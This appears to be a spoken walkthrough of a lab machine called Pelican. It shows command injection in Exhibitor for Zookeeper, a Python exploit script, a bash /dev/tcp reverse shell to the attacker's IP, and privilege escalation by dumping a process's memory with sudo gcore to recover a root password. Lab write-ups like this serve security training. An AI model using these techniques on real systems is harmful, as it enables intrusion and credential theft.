Let's go ahead and start off with a rustscan. Let's do tag A for the addresses, and let's do tag U for the U limit. Then we can go ahead and do dash dash and specify a couple other nmap ports that we want to go ahead and use. So let's do tag SC for default scripts, tag SV to enumerate the versions, tag VV to get some verbose output, and tag ON to output to a file. Call it initial, and go ahead and send it through. So here we already can see that we have a couple of ports coming through here. We do have SMB, we have 139, which is NetBIOS, we have 22, which is SSH, we have 8080 and 8081, which I'm assuming are HTTP or web servers. We have a couple odd ports here that we don't normally see often, so we can go ahead and take a look at those two in detail when this does finish. So this should take another couple of seconds. And there it is. Let's do less enum initial, and we can go ahead and see what we got. So right here, we do have SSH, and this tells us that this is a Debian instance. So if we scroll down a little bit more, we can also see that we have the Samba right here, or SMB, and NetBIOS. We have cups running on 631, which cups, I'm assuming, if this is the right cups that I'm thinking about, this is some type of printing manager for Linux or Unix. We also have 8080 or 8081, which are both HTTP, and this one's running Jetty, which Jetty is like a Java web server or Java web application, and this one's running Nginx. Now, this one, the Jetty one, is saying that we have an error here, an error 404 not found. But the Nginx one redirects us to a page, Exhibitor v1 UI index.html. So we can go ahead and take a look at that now in a moment. And here we have this Java RMI on 37753. Although I want to go ahead and start off with SMB, considering we do have guest access here. So let's go ahead and start there. Let's do SMB client, tag L, and then let's go ahead and list the shares. And we don't have anything useful. I mean, all these are default shares, and we're not really going to get anything from this. Another way that you could have enumerated this would be through NXC. So you could do NXC or crackmap with SMB, the IP address, and then you can do a tag U with a random username and tag P with no password, and go ahead and give it the shares flag. It's going to authenticate us and give us the shares that are available. Although we're not going to get anything from there, so we can go ahead and start looking at the HTTP servers. Let's start with the one that redirects us. So let's do this with 8081. And we get this exhibitor for Zookeeper. If we look on the right side, I'm going to go ahead and zoom in. We can see this is v1.0 or version 1.0. So let's go ahead and see if there's a public exploit available for this. Let's do Exhibitor 1.0 exploit. So here we can see that we have this Exhibitor Web UI 171 remote code execution. So if we go ahead and click on this is from ExploitDB, and this is basically steps on how to recreate this vulnerability or how to exploit this vulnerability, right? This is an awesome read if you want to understand it a little bit more. Also, it has some mitigation tactics down here in case you wanted to figure out how to mitigate against this type of vulnerability or this type of attack. So how does this actually work? If we go back to the Exhibitor tab over here, and we can see that we have this config tab. If we click on this, we have this java.env script that runs every time the application is reset or every time the application is started up. Now, within this field right here, these are arguments that are passed to this script whenever it is run. So what we can do is basically using these sort of encasing, this double backslash, or no, not backslash, backticks. Yeah, these double backticks or this $ parentheses, we can embed our own code or our own commands within these arguments that are passed to that script and have it run when it is reset. So that is what it's saying right here. The java.env script, we can just pass it commands using this embedding sort of formatting. And if you don't know how that works, let's say if we had a file, right? And that file, let's do vi file. We have these 4 names in here, and we want to print out these 4 names to the terminal, right? So let's say that we wanted to do a for loop. So let's do for I in, and then we can do a $cat file like this. And then we can do echo $I and done like this. If we click enter here, we are going to have each name printed out to us. And if we also just change this to the backticks, we can see that it happens again. But if we just did it without those, or without that formatting, we can see that it just prints out these 2 strings here, this cat and this file. So we are embedding a command within these, or within this for loop. And that's how basically what we're doing within that JavaScript, right? So what we can do is we can exploit this a couple of ways. The simplest way, the easiest way to do this would just be to come here to the config panel. We can click on, we can go into this field right here, zoom in a little bit so we can see better. And then we can go ahead and do a backtick bash, or let's see if this works, right? We can try a ping command first. We can do ping tac-c for the count of 1, and then 192.168.45.222, which is our IP address. And then we can go ahead and close that off with another backtick. Let's set up a TCP dump. TCP dump, tac I, ton 0, and then ICMP. There we go. So what we can do here is go to this commit button right here and click all at once. Click OK. This is going to change the config, and it's going to restart it automatically. And you can see here that we have the ICMP ping. So we do know that we can have command execution or command injection, right? So let's do something here. This is the easiest way to sort of exploit this vulnerability. Now, another way that you could do this is, let's close this off. Let's start it again. And let's go ahead and change this to nothing for now. So we can go ahead and do it. All right, now another way to exploit this would just be through curl and doing this curl command right here. Let's go ahead and copy this. We're getting pinged a lot now. Let me see, did this finish? Yeah, so we should be good for now. Let's go ahead and restart this. And let's do a curl command. So if we did this curl command right here, and we're posting to the config set, so we can set the actual config of the JavaEnvironment variable, and we can change this to be, where is it? Right here. This JSON data right here. So we can grab all of this. We'll copy it here, paste it in here, and then what we can do is we can change. Actually, let's put this in the right format. Oh, actually, I'm not sure that this is going to work because these are not double quotes. These are like weird formatting double quotes that don't actually work within Bash. Let's see if this works. So here we can go ahead and change the Java environment, which is right here. Now you can see that this is set to a sort of reverse shell, so we can close this out, and then we can do a ping tac-c 192.168.45.222 like that. Have it closed off, and well, you know what? What I'm going to do here is let's go ahead and copy this. Copy. Let's vi file. Doesn't matter. Paste this in here, and then let's do a sed command to replace, and let's replace all of cat file Oh, I didn't save it. Hold on. Let's split the screen here. Let's cat file so we can do that. Let's vi file, and then let's grab this guy here, and then we can do a %s and then replace all of these with the regular ones. There we go. And then we can grab this one and replace all of these with this one /g. And there we go. That should be good. Let's go ahead and save this. Close out of this one. We can cat out file. We can grab this. Let's paste it in as an actual command, and let's put in the IP address of the box here. Copy that, paste it in here, and this is going to be 8080 exhibitor v1 config and set. All right, so let's go ahead and send this through. There is a triple dash here somewhere. Let's see. Where is that at? Curl. Man, I can't really see it. Oh, is it because of this? Should we put it in single quotes, maybe? Let's see. There you go. Let's see if this works. Okay, succeeded, true. Now we just wait for a moment, and let's see if we get the ping from this command. If we go back here, we go to Exhibitor, we can see that the ping did come back, or it did sort of get set. Now we just wait for a moment. If we refresh this, let's see. Okay, so we do have it here, and it did work, and there we go. So here is another way that you could do this that took very long, although that's fine. A little bit of troubleshooting never hurt anybody, but I'm assuming that this happened because there's also double quotes in here. So we just had to change this double quote from the outside of the JSON to a single quote and then send that through. So that's just another way that you can exploit this. Now, what we're going to do, or what I wanted to do, one other way that you can exploit this is through just creating your own proof of concept script, right? So let's go ahead and do that with Python. Let's do I'm going to do it in Sublime Text just because it's a little bit easier to see on camera or see on the video. And let's do exploit.py. Okay, so let's do a shebang, and then is it user bin env and then Python 3. There you go. We can import requests, the requests module or request library. And let's go ahead and do URL equals http:// and then we can grab this right here, paste it in here. I guess we don't need this http here. Let's go ahead and set this, instead of to the index.html, let's set this to config and then set to be able to set that config. Let's do data equals, and then let's do JSON here. Let's actually cat out file. Let's grab this entire thing here, this entire string. Where is it? Right here. And it starts right here. Actually, I'm just going to grab this. There we go. Copy. We'll paste the data in here. And let's see, can I grab this? Not sure if that's going to work. All right, I do want to do a little bit of formatting, and I'm sorry if you guys don't like that. I just like to see things a little bit better. all together instead of just one big line. All right, let's see. One Exhibitor demo. All right, we have this one, and there is our Java environment. Let's see. Properties, this. Right here. Now, this doesn't actually make a difference. This is just for visual purposes for myself, really. Let's see. Grab this. This is weird. That probably shouldn't be there. And this. Oh, yeah, it shouldn't, actually. Let me see. Let me check that out just to make sure. Yeah. So we do have that. Okay, and it's all within this. So this is now JSON data. We can grab this right here, which is our command. We can change that to a CMD variable, and then we can do a str to make it a string, and then we can do a insert. Is it insert? No, input to get user data. Then we can do a little like, I don't know, prompt like this, makeshift prompt. And then we can set this to the CMD variable. If we scroll down a little bit. Now what we're going to do from here is let's go ahead and set a variable for the response. So let's do response equals, and then we're going to send the post request. So we can do requests.post, and we are going to post to the URL, and we're going to post JSON data equals data like this. And then from here, we could do print response, and we can also do if response dot status code equals to 200, print exploit successful like this, and then wait for your command to execute like this. And we can do an else print exploit unsuccessful like this, and then plus status response dot status code like that. That should be good. Should allow us to work it through. Posting the JSON data. All right, let's try this out. Let's go back to the terminal. We have this set up right here. We could do ncat nvlp 9999. And then down here, let's actually just do this in a new tab. So, not this tab, brand new tab. Here we go. Let's do cdoc machines Pelican, and we are in here. We have exploit.py. So let's do chmod plus x on exploit.py, and we could do python3 exploit.py, and here we have our little makeshift how do you say it, a little prompt. And then here we can just go ahead and input our command. So let's do $, and then parenthesis, and we can do a bash tech I, and then to and dev tcp 192.168.45.151, or is it 151? No, 222.9999, and then here we can do 0, 2, and 1 to close it off. Finish off with a parenthesis, send it through. Didn't get any errors. Okay, let's go back to the other. Set this up. That might be helpful. And let's see if this works, if this comes through. We can see that it actually did work. We do have this, or our shell right here, our reverse shell. So all we have to do is look back here and wait for the shell to come through to the listener. And just like that, we have a shell on the box. And I hope you guys enjoyed that little portion of different types of ways to actually exploit that certain vulnerability and that little Python script thing that you didn't really need to do. But if you did want to practice your Python skills, that might be something to look into a little bit more. Now, the first thing I like to do when I get on a shell is sort of stabilize it a little bit using Python or script or another binary that just allows me to sort of stabilize the shell and get as minimal distractions and disruptions as possible when I'm going through the enumeration process, right? So let's go ahead and do if I could type which Python 3, we do have Python 3, so we can do Python 3 text C, import pty.spawn, like this, bin bash, and then we can do Control Z to background it, and then we can do stty raw -echo :fg space, enter. Then here we are again in the foregrounded netcat session, and we could do export term equals xterm to get our sort of right and left arrows, up and down arrows, and to be able to clear the screen. So now we have a more stabilized shell. We can do Control-Shift+ to make it a little bit bigger. And the first thing I want to do whenever I get onto a web server is see if there's a database. Maybe inside that database there's more credentials that can lead to privilege escalation or something like that, right? Now, in this Zookeeper directory within opt, it doesn't look like there's anything that says database or something like that other than data. We can lsla on data, and there's nothing in there. lsla on docs. There's a bunch of documents on here, although all this is like, I think, static templates type of stuff. And then we can also see this config, cd conf. And in here, we do have the configuration.xls, so we can do grep-ri password. There's nothing in here, so that's about it for this. We can go ahead and see ssnltp to see if there's any listening ports for databases like 3306 or 14, what's MS SQL, 14 something. But we don't see any of that here. We only see the ports that we saw open on Nmap. Nothing fairly new or nothing running internally or something that says 127.0.0.1. That would be something that's running internally. Then we can go ahead and use Chisel to port forward that to our box, or even SSH if we find some credentials like that, right? So there's nothing here. We can also check the environment variables, env. We can see all these environment variables. Sometimes there is like database passwords in here, database usernames, different things like that. But normally that is on a web user or a web service account or a database service account if you happen to land on one of those, right? So this doesn't have anything here. Let's see. We can also check. We can see if there's any other users on the box. So let's see cat etc pass wd and then grep for anything that ends in sh. So this is the end of line. That's why we're putting that there. And this is going to show us anything that ends in sh. So there's only Charles and root. So it's only up from here, basically. Let's see. What else can we go ahead and check? We can do ID to see if we're part of any other groups. Not really. We can do df and then let's see. Yeah, this would list all of the mounted drives, so we can go ahead and see where the main drive is mounted, or like the root of the file system is mounted, which is this one right here, in case that we could have done anything like that. If we were part of like the disk group, or yeah, I think it's the disk group. I think it's 6. I'm not 100% on that. We could possibly use debugfs to access the drive or access the mount in debug mode, and then go from there, read stuff as a root, that type of stuff. But another thing we can do here, right, is let's go ahead and get linpeas on here. But before we do that, let's cat out cron tab And if we do that, we scroll down, we have this at reboot. Root is running some cron tabs here. Root is running some scheduled tasks here. We're doing while true, do chown r Charles. So we're changing the owner of these Zookeeper and changing the owner of the Exhibitor folders or directories to Charles. And we're also using this user bin password store. So if we go back here and we do password store Linux, we can see that this is a password manager, an open source password manager for Linux. So we can go back right here and let's go ahead and upload linpeas on here. Let's do locate linpeas.sh. All right, so let's cp opt linpeas.sh and let's send it here. Now we have it, and let's do Python 3 http server 80. And here, do we have curl? No, we don't. Do we have, well, let's actually go to our home directory, or we can go to temp. Okay, let's see, do we have wget? Yeah, we do. Cool. So let's do wget http and then our IP address and linpeas.sh like that. There we go. We have linpeas, and we could just do chmod plus x on linpeas, and we can go ahead and run it. So this might take a little bit of time, although this is going to find all the possible privilege escalation methods or paths that we possibly can have with this current user that we now own, right? So one of the things that we saw that was fairly interesting is that password store binary, right? That root is running. Oh, I just saw a yellow, an orange and yellow, or whatever, an orange and red type of thing pop up here. Let's see. If we go to the top, oh, there it was, I think. Okay, we have this Zookeeper and Exhibitor. Okay, let's see. Anything else here? So it is changing the owner to us. Right there. Let's see, what else does this find? Is there any other, like orange and red? Okay, right here. So the user Charles, which is us, can run gcore with no password as root. So this is fairly interesting. Now, other than this, we did see the cron tab that has that password store in it right here. So this is fairly interesting. Now, we do want to see if this is actually running right now. So we could do ps-ef and then grep for root. If we scroll up a little bit, we can see if this is running currently. Let's see. Didn't see it down here. Let's scroll up a little bit. Doesn't look like it. Oh yeah, right here. We have this bin sh while true. And then if we scroll down right here, we have this password store. So these are real, or not real, but these are programs or applications that are running currently. So this is good because gcore, if we go ahead and come here to Google and let's do gcore man. If you don't know, gcore just generates a core file or a memory dump of a certain running process. So if that password store is holding root's password, we can go ahead and potentially see sensitive information from that, right? So let's go ahead and do sudo /user bin gcore, right? And then we could do tech a, and let's see, where is this process number or the PID? Right here is 484. We can copy this, scroll down a little bit, and the A is, let's just go ahead and do this. So the A is for, let's see, here, dump all memory mappings. So I guess it just gets all the data. So we can do tech A like that, and then the PID, enter. And here we have it. So it generates like a crash dump without actually crashing the file. It actually detaches from it, and then it continues running. The program continues running without a problem, right? So now we have this core 484 right here. And what we can do from here is we can do strings on core 484. Let's go ahead and sort and unique, or well, we can sort it out. Let's see if there's anything in here. Let's go ahead and grep password. Okay, so we have this 001 password root, and if we do a tag A and then 5 and tag B 5, this is after, or 5 lines after and 5 lines before. Click enter. Let's see, there's nothing here. Let's see, what if we remove this sort? Maybe it's messing with the formatting of it. Yeah, right here. So we have this 001 password root, and then we have the password right here, clog kingpin inning 731. If we copy this, we do su dash, paste that in, and we are now root at Pelican. So that was the box. I hope you guys enjoyed. This might have been a little bit long of a video for this easy box, I mean, so to say, but there was a lot of cool, like, different tips and tricks that we used just to sort of gain a little bit more knowledge on different ways that you can do different things, right? Or that you can get information. So I hope you guys enjoyed. Leave a comment, like, and subscribe, and let me know if you guys want me to do any other type of videos, some Linux privilege escalation videos, some Windows privilege escalation videos, Active Directory, depending on whatever you guys want. We'll go ahead and try and do those. So that being said, I'll see you guys in the next one.